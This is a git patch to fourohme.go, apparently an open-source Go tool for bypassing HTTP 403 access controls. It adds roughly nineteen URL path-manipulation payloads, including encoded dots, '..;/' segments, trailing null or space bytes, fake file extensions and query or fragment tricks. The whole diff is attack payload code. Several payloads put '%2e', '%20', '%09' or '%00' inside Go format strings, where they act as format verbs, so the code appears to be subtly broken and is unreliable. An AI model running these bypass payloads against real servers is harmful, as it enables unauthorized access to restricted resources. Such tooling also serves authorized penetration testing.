From b4f990f89d0de8c1a5ac0a75ab2f1d75579bf21d Mon Sep 17 00:00:00 2001 From: topscoder <86197446+topscoder@users.noreply.github.com> Date: Mon, 5 Feb 2024 13:28:48 +0100 Subject: [PATCH] Adds additional path manipulation options Borrowed from https://github.com/yunemse48/403bypasser --- fourohme.go | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/fourohme.go b/fourohme.go index a9010e8..0df2636 100644 --- a/fourohme.go +++ b/fourohme.go @@ -507,6 +507,25 @@ func main() { urlList = append(urlList, fmt.Sprintf("%s/.;%s", sUrl, sPath)) urlList = append(urlList, fmt.Sprintf("%s//;/%s", sUrl, sPath)) urlList = append(urlList, fmt.Sprintf("%s%s", sUrl, strings.ToUpper(sPath))) + urlList = append(urlList, fmt.Sprintf("%s/%2e/%s", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s..;/", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s/..;/", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s%20", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s%09", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s%00", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s.json", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s.css", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s.html", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s?", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s??", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s???", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s?testparam=fourohme", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s#", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s#test", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/%s/.", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s//%s//", sUrl, sPath)) + urlList = append(urlList, fmt.Sprintf("%s/./%s/./", sUrl, sPath)) for _, url := range urlList { wg.Add(1)